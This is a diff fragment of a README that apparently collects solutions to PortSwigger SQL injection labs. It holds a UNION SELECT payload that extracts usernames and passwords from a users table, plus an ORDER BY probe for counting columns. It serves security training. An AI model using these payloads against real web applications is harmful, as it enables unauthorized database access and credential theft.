mithu9554/Portswigger_labs2-/SQL_injection/README.md

 ```sh
 '+UNION+SELECT+USERNAME_ABCDEF,+PASSWORD_ABCDEF+FROM+USERS_ABCDEF--
 ```
-### Lab: SQL injection UNION attack, determining the number of columns returned by the query
+### Lab7: SQL injection UNION attack, determining the number of columns returned by the query
 ```sh
 order by 3--
 ```